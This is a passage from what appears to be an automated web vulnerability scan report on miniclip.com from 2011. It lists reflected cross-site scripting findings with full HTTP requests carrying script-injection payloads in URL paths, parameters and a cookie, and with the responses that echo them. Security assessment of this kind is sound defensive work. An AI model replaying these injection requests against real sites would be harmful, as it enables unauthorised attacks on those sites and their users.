__qca=P0-1550842470-1311162245817
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:49:39 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:49:39 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:54:39 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:54:39 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:54:39 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82611 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/sketch-star/ss-libcde83"><script>alert(1)</script>912545899b3 /ajax.php" />...[SNIP]...
1.20. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/sketch-star/ss-lib/ajax.php
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c56f"><script>alert(1)</script>be03f99927 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sketch-star/ss-lib/ajax.php9c56f"><script>alert(1)</script>be03f99927 ?action=getHomepageModule HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:49:48 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:49:48 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:54:48 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:54:48 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:54:48 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82615 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/sketch-star/ss-lib/ajax.php9c56f"><script>alert(1)</script>be03f99927 " />...[SNIP]...
1.21. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [action parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/sketch-star/ss-lib/ajax.php
Issue detail
The value of the action request parameter is copied into the HTML document as plain text between tags. The payload bd23e<script>alert(1)</script>329c7d62a17 was submitted in the action parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sketch-star/ss-lib/ajax.php?action=getHomepageModulebd23e<script>alert(1)</script>329c7d62a17 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:45:11 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 115 Content-Type: text/html; charset=UTF-8 An error occured: Unable to load Controller_Ajax::GetHomepageModulebd23e<script>alert(1)</script>329c7d62a17 Action.
1.22. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/sketch-star/ss-lib/ajax.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86889<script>alert(1)</script>92331bbc124 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sketch-star/ss-lib/ajax.php?action=getHomepageMo/86889<script>alert(1)</script>92331bbc124 dule HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:48:47 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 116 Content-Type: text/html; charset=UTF-8 An error occured: Unable to load Controller_Ajax::GetHomepageMo/86889<script>alert(1)</script>92331bbc124 duleAction.
1.23. http://www.miniclip.com/sketch-star/ss-lib/thumb.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/sketch-star/ss-lib/thumb.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bd8c"><script>alert(1)</script>6fc46d3cb38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sketch-star3bd8c"><script>alert(1)</script>6fc46d3cb38 /ss-lib/thumb.php?type=topichome&id=278425&width=76&height=58 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:45:50 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:45:50 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:50:51 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:50:51 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:50:51 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82523 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/sketch-star3bd8c"><script>alert(1)</script>6fc46d3cb38 /ss-lib/thumb.php" />...[SNIP]...
1.24. http://www.miniclip.com/sketch-star/ss-lib/thumb.php [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/sketch-star/ss-lib/thumb.php
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b825"><script>alert(1)</script>23a79f3939f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sketch-star/ss-lib3b825"><script>alert(1)</script>23a79f3939f /thumb.php?type=topichome&id=278425&width=76&height=58 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:45:56 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:45:56 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:50:56 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:50:56 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:50:56 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82523 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/sketch-star/ss-lib3b825"><script>alert(1)</script>23a79f3939f /thumb.php" />...[SNIP]...
1.25. http://www.miniclip.com/sketch-star/ss-lib/thumb.php [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/sketch-star/ss-lib/thumb.php
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15939"><script>alert(1)</script>334f3bc0359 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sketch-star/ss-lib/thumb.php15939"><script>alert(1)</script>334f3bc0359 ?type=topichome&id=278425&width=76&height=58 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:46:01 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:46:01 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:51:01 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:51:01 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:51:01 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82526 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/sketch-star/ss-lib/thumb.php15939"><script>alert(1)</script>334f3bc0359 " />...[SNIP]...
1.26. http://www.miniclip.com/styles/css.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/styles/css.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a5cf"><script>alert(1)</script>d7dce320156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles7a5cf"><script>alert(1)</script>d7dce320156 /css.php?f=styles,uni,quicksearch,games,homepage&dc=201121 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:43:29 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:43:29 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:48:29 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:29 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:29 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82509 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/styles7a5cf"><script>alert(1)</script>d7dce320156 /css.php" />...[SNIP]...
1.27. http://www.miniclip.com/styles/css.php [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/styles/css.php
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536c5"><script>alert(1)</script>ef92b54819a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/css.php536c5"><script>alert(1)</script>ef92b54819a ?f=styles,uni,quicksearch,games,homepage&dc=201121 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:43:30 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:43:30 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:48:30 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:30 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:30 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82509 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/styles/css.php536c5"><script>alert(1)</script>ef92b54819a " />...[SNIP]...
1.28. http://www.miniclip.com/games/american-football/en/ [ipLocation cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/american-football/en/
Issue detail
The value of the ipLocation cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c3b8</script><script>alert(1)</script>63e8fa17405 was submitted in the ipLocation cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/american-football/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US6c3b8</script><script>alert(1)</script>63e8fa17405 ; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:47:35 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:47:35 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:gamepage=false; expires=Wed, 20-Jul-2011 11:52:35 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:gamepage=false; expires=Wed, 20-Jul-2011 11:52:35 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:gamepage=false; expires=Wed, 20-Jul-2011 11:52:35 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 99561 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>American Football - American Footbal...[SNIP]... setBodyMargin(); initTopTen(); if (detectUnityWebPlayer()) { statTracker("/unity/installed/"); } else { statTracker("/unity/not-installed/"); } statTracker('/u/country/en/us6c3b8</script><script>alert(1)</script>63e8fa17405 /en-us%2cen%3bq%3d0.5/'); </script>...[SNIP]...
1.29. http://www.miniclip.com/games/american-football/en/ [ipLocation cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/american-football/en/
Issue detail
The value of the ipLocation cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0cf1</script><script>alert(1)</script>96e53526005 was submitted in the ipLocation cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
